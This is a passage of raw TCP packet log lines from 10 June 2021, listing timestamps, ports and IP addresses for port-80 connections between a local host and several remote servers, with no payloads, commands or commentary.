                                  Jun 10, 2021 15:24:52.072345972 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072352886 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072370052 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072371960 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072386026 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072393894 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072403908 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072417021 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072421074 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072437048 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072439909 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072453976 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072463036 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072470903 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072489023 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072489977 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072508097 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072510004 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072524071 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072530985 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072540045 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072556019 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072556019 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072573900 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072581053 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072590113 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072602034 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072606087 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072624922 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072626114 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072643995 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072647095 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072659969 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072674990 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072675943 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072693110 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072695017 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072710037 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072721958 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072726011 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072741985 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072747946 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072762012 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072767019 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072784901 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072786093 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072802067 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072808981 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072819948 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072835922 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072844028 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072851896 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072884083 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072899103 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072901011 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072906017 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072916985 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072921991 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072940111 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072947979 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072972059 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072984934 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072998047 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073028088 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073039055 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073044062 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073044062 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073060989 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073081970 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073086023 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073086977 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073101997 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073107958 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073122025 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073126078 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073138952 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073152065 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073158026 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073175907 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073183060 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073195934 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073199034 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073215961 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073224068 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073247910 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073251009 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073270082 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073287010 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073290110 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073303938 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073312044 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073323965 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073340893 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073342085 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073357105 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073364973 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073374033 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073390961 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073390007 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073406935 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073415041 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073425055 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073438883 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073440075 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073460102 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073460102 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073477030 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073482990 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073493958 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073507071 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073509932 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073527098 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073528051 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073542118 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073551893 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073558092 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073574066 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073577881 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073594093 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073601961 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073625088 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073649883 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073667049 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073682070 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073689938 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073698997 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073713064 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073714972 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073734999 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073735952 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073753119 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073764086 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073771000 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073782921 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073788881 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073800087 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073807001 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073816061 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073832989 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073837996 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073863029 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073882103 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073884964 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073901892 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073918104 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073921919 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073935032 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073945999 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073951006 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073966980 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.073967934 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073983908 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.073988914 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.074009895 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.074028969 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.074057102 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.074065924 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.074071884 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.074088097 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.074090004 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.074106932 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.074107885 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.074126005 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.074129105 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.074148893 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.074156046 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.074168921 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.074193954 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.074198961 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.074234009 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076308966 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076334000 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076345921 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076361895 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076376915 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076394081 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076409101 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076427937 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076435089 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076463938 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076467037 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076483965 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076499939 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076503038 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076515913 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076529026 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076531887 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076549053 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076550007 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076565027 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076575041 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076585054 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076595068 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076601982 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076618910 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076620102 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076636076 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076641083 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076653004 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076664925 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076683998 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076687098 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076714993 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076720953 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076733112 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076749086 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076751947 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076765060 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076772928 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076797009 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076812029 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076828957 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076844931 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076848030 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076873064 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076873064 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076920986 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076922894 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076937914 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076953888 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.076963902 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076984882 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.076991081 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077008009 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077009916 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077025890 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077030897 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077043056 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077054977 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077059984 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077078104 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077080011 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077100039 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077110052 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077122927 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077137947 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077146053 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077166080 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077167034 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077182055 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077200890 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077208996 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077219963 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077234030 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077238083 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077255011 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077255011 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077271938 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077276945 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077294111 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077301979 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077316999 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077332973 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077332973 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077352047 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077353001 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077369928 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077387094 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077398062 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077405930 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077416897 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077430964 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077440023 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077446938 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077462912 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077462912 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077478886 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077483892 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077500105 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077508926 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077517033 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077532053 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077533007 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077550888 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077553988 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077567101 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077574968 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077589035 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077600002 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077608109 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077624083 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077624083 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077645063 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077647924 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077662945 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077671051 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077680111 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077692986 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077696085 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077713013 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077716112 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077729940 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077737093 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077742100 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077758074 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077761889 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077774048 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077785015 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077790022 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077805996 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077807903 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077821970 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077830076 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077837944 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077850103 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077857018 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077871084 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077874899 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077891111 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077892065 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077907085 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077922106 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077924967 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077938080 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077943087 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077951908 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.077967882 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.077997923 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.079036951 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.917033911 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:26:08.676799059 CEST4916680192.168.2.22172.67.161.4
                                  Jun 10, 2021 15:26:08.719157934 CEST8049166172.67.161.4192.168.2.22
                                  Jun 10, 2021 15:26:08.719304085 CEST4916680192.168.2.22172.67.161.4
                                  Jun 10, 2021 15:26:08.719491959 CEST4916680192.168.2.22172.67.161.4
                                  Jun 10, 2021 15:26:08.761806011 CEST8049166172.67.161.4192.168.2.22
                                  Jun 10, 2021 15:26:08.786259890 CEST8049166172.67.161.4192.168.2.22
                                  Jun 10, 2021 15:26:08.786566019 CEST4916680192.168.2.22172.67.161.4
                                  Jun 10, 2021 15:26:08.786638975 CEST8049166172.67.161.4192.168.2.22
                                  Jun 10, 2021 15:26:08.786689043 CEST4916680192.168.2.22172.67.161.4
                                  Jun 10, 2021 15:26:08.828906059 CEST8049166172.67.161.4192.168.2.22
                                  Jun 10, 2021 15:26:14.381091118 CEST4916780192.168.2.22163.43.122.104
                                  Jun 10, 2021 15:26:14.692454100 CEST8049167163.43.122.104192.168.2.22
                                  Jun 10, 2021 15:26:14.692559004 CEST4916780192.168.2.22163.43.122.104
                                  Jun 10, 2021 15:26:14.692687035 CEST4916780192.168.2.22163.43.122.104
                                  Jun 10, 2021 15:26:15.011657000 CEST8049167163.43.122.104192.168.2.22
                                  Jun 10, 2021 15:26:15.013705969 CEST8049167163.43.122.104192.168.2.22
                                  Jun 10, 2021 15:26:15.013732910 CEST8049167163.43.122.104192.168.2.22
                                  Jun 10, 2021 15:26:15.013942003 CEST4916780192.168.2.22163.43.122.104
                                  Jun 10, 2021 15:26:15.013993979 CEST4916780192.168.2.22163.43.122.104
                                  Jun 10, 2021 15:26:15.349241018 CEST8049167163.43.122.104192.168.2.22
                                  Jun 10, 2021 15:26:27.560842037 CEST4916880192.168.2.2299.83.154.118
                                  Jun 10, 2021 15:26:27.602737904 CEST804916899.83.154.118192.168.2.22
                                  Jun 10, 2021 15:26:27.604615927 CEST4916880192.168.2.2299.83.154.118
                                  Jun 10, 2021 15:26:27.605036020 CEST4916880192.168.2.2299.83.154.118
                                  Jun 10, 2021 15:26:27.646814108 CEST804916899.83.154.118192.168.2.22
